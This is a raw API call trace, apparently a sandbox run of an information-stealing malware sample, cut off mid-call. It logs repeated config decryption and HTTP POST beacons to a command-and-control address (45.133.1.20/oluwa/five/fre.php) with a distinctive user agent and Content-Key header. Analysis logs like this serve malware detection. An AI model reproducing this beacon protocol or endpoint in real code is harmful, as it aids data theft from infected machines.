RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0164.453] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.453] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0164.454] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.454] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0164.455] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.456] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0164.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.457] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0164.458] GetProcessHeap () returned 0x6a0000 [0164.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0164.458] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9fc8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be790*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0164.458] GetProcessHeap () returned 0x6a0000 [0164.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0164.458] socket (af=2, type=1, protocol=6) returned 0x2e4 [0164.458] connect (s=0x2e4, name=0x6be790*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0164.483] FreeAddrInfoW (pAddrInfo=0x6b9fc8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be790*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0164.483] GetProcessHeap () returned 0x6a0000 [0164.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0164.483] GetProcessHeap () returned 0x6a0000 [0164.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0164.485] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0164.486] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0164.486] GetProcessHeap () returned 0x6a0000 [0164.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0164.486] GetProcessHeap () returned 0x6a0000 [0164.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0164.486] GetProcessHeap () returned 0x6a0000 [0164.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0164.486] GetProcessHeap () returned 0x6a0000 [0164.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0164.487] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0164.488] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0164.488] GetProcessHeap () returned 0x6a0000 [0164.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0164.488] GetProcessHeap () returned 0x6a0000 [0164.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0164.488] send (s=0x2e4, buf=0x6bbd20*, len=242, flags=0) returned 242 [0164.489] send (s=0x2e4, buf=0x6bb998*, len=159, flags=0) returned 159 [0164.489] GetProcessHeap () returned 0x6a0000 [0164.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0164.489] recv (in: s=0x2e4, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0164.556] GetProcessHeap () returned 0x6a0000 [0164.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0164.556] GetProcessHeap () returned 0x6a0000 [0164.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0164.557] GetProcessHeap () returned 0x6a0000 [0164.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0164.557] GetProcessHeap () returned 0x6a0000 [0164.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0164.559] closesocket (s=0x2e4) returned 0 [0164.560] GetProcessHeap () returned 0x6a0000 [0164.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0164.560] GetProcessHeap () returned 0x6a0000 [0164.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0164.562] GetProcessHeap () returned 0x6a0000 [0164.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0164.562] GetProcessHeap () returned 0x6a0000 [0164.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0164.563] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8b8) returned 0x2e4 [0164.565] Sleep (dwMilliseconds=0xea60) [0164.566] GetProcessHeap () returned 0x6a0000 [0164.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0164.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.568] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0164.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.578] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0164.590] GetProcessHeap () returned 0x6a0000 [0164.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0164.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.593] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0164.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.596] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0164.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.598] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0164.598] GetProcessHeap () returned 0x6a0000 [0164.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0164.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.600] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0164.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.602] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0164.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.612] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0164.612] GetProcessHeap () returned 0x6a0000 [0164.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0164.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.613] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0164.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.614] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0164.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.617] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0164.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.618] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0164.618] GetProcessHeap () returned 0x6a0000 [0164.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0164.618] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0164.619] GetProcessHeap () returned 0x6a0000 [0164.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0164.619] GetProcessHeap () returned 0x6a0000 [0164.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0164.620] GetProcessHeap () returned 0x6a0000 [0164.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0164.620] GetProcessHeap () returned 0x6a0000 [0164.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0164.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.621] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0164.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.632] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0164.641] GetProcessHeap () returned 0x6a0000 [0164.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0164.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.642] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0164.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.643] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0164.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.644] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0164.644] GetProcessHeap () returned 0x6a0000 [0164.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0164.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.656] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0164.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.657] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0164.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.658] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0164.658] GetProcessHeap () returned 0x6a0000 [0164.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0164.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.663] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0164.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.665] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0164.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.666] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0164.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.667] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0164.667] GetProcessHeap () returned 0x6a0000 [0164.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0164.683] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ba0e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0164.683] GetProcessHeap () returned 0x6a0000 [0164.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0164.683] socket (af=2, type=1, protocol=6) returned 0x2e8 [0164.684] connect (s=0x2e8, name=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0164.708] FreeAddrInfoW (pAddrInfo=0x6ba0e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0164.708] GetProcessHeap () returned 0x6a0000 [0164.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0164.708] GetProcessHeap () returned 0x6a0000 [0164.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0164.709] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0164.713] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0164.713] GetProcessHeap () returned 0x6a0000 [0164.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0164.713] GetProcessHeap () returned 0x6a0000 [0164.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0164.714] GetProcessHeap () returned 0x6a0000 [0164.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0164.714] GetProcessHeap () returned 0x6a0000 [0164.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0164.715] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0164.716] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0164.716] GetProcessHeap () returned 0x6a0000 [0164.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0164.716] GetProcessHeap () returned 0x6a0000 [0164.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0164.716] send (s=0x2e8, buf=0x6bbd20*, len=242, flags=0) returned 242 [0164.717] send (s=0x2e8, buf=0x6bb998*, len=159, flags=0) returned 159 [0164.717] GetProcessHeap () returned 0x6a0000 [0164.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0164.717] recv (in: s=0x2e8, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0164.795] GetProcessHeap () returned 0x6a0000 [0164.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0164.798] GetProcessHeap () returned 0x6a0000 [0164.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0164.798] GetProcessHeap () returned 0x6a0000 [0164.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0164.800] GetProcessHeap () returned 0x6a0000 [0164.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0164.800] closesocket (s=0x2e8) returned 0 [0164.801] GetProcessHeap () returned 0x6a0000 [0164.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0164.801] GetProcessHeap () returned 0x6a0000 [0164.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0164.801] GetProcessHeap () returned 0x6a0000 [0164.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0164.802] GetProcessHeap () returned 0x6a0000 [0164.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0164.802] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xac4) returned 0x2e8 [0164.804] Sleep (dwMilliseconds=0xea60) [0164.806] GetProcessHeap () returned 0x6a0000 [0164.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0164.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.808] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0164.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.818] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0164.831] GetProcessHeap () returned 0x6a0000 [0164.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0164.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.835] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0164.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.836] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0164.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.838] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0164.838] GetProcessHeap () returned 0x6a0000 [0164.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0164.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.840] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0164.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.841] CryptDestroyKey (hKey=0x6ad020) returned 1 [0164.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.851] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0164.851] GetProcessHeap () returned 0x6a0000 [0164.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0164.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.853] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0164.857] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.857] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0164.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.859] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0164.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.860] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0164.860] GetProcessHeap () returned 0x6a0000 [0164.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0164.860] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0164.860] GetProcessHeap () returned 0x6a0000 [0164.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0164.861] GetProcessHeap () returned 0x6a0000 [0164.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0164.861] GetProcessHeap () returned 0x6a0000 [0164.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0164.861] GetProcessHeap () returned 0x6a0000 [0164.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0164.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.862] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0164.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.873] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0164.883] GetProcessHeap () returned 0x6a0000 [0164.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0164.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.884] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0164.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.885] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0164.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.886] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0164.886] GetProcessHeap () returned 0x6a0000 [0164.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0164.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.887] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0164.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.891] CryptDestroyKey (hKey=0x6ad520) returned 1 [0164.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.892] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0164.892] GetProcessHeap () returned 0x6a0000 [0164.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0164.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.894] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0164.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.895] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0165.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.002] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0165.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.004] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0165.009] GetProcessHeap () returned 0x6a0000 [0165.009] RtlAllocateHeap (HeapHandle=0x6a0000, 